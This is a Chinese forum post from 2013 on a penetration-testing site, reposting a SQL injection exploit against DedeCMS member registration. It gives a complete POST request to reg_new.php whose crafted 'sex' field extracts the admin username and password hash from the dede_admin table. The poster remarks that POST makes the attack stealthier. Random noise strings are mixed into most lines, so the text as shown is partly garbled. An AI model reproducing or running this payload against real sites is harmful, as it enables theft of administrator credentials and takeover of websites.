中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
# p8 }) P; c7 S) v. o简要描述:
5 |4 {0 m. H  B5 D
0 Q; Y. b6 {+ R, J4 G需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 A0 k8 f# z1 P9 q: f5 _# J8 i
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.. y4 v5 t) h0 u9 z! A& X
详细说明:跟这个漏洞
& W5 E" A. b9 z. _1 E. J2 @/ F5 M/ c
- [, Z/ z% b) o9 ~' K( T! AWooYun: Dedecms SQL注射导致审核机制绕过漏洞5 A1 i0 {( D( C0 ~- t/ t" Y
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.8 ~! ?: A: k! n4 ]5 \
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
1 w" `; N6 P  o: g" U/ T
7 |3 W* L% Y: i0 L$ @. `www.political-security.com/member/reg_new.php
( |- L) O2 ~% Q. ]
: e; @& [5 T% `3 b8 b- CPOST& o% m# Q2 T' \8 s
( F  T5 H9 M4 O$ C! f2 q1 U  l
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&  P& M  Z9 B, J: X: l$ L  E# d
userid=c4rp3nt3r&uname=c4rp3nt3r
7 e' N8 b  z) q$ Z6 ?&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
' s5 ^/ M& `) g3 ?&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
& w. o+ h9 K1 p% G! p+ f9 ](select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');9 i' e; Q7 Y+ `/ q) W3 X
%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2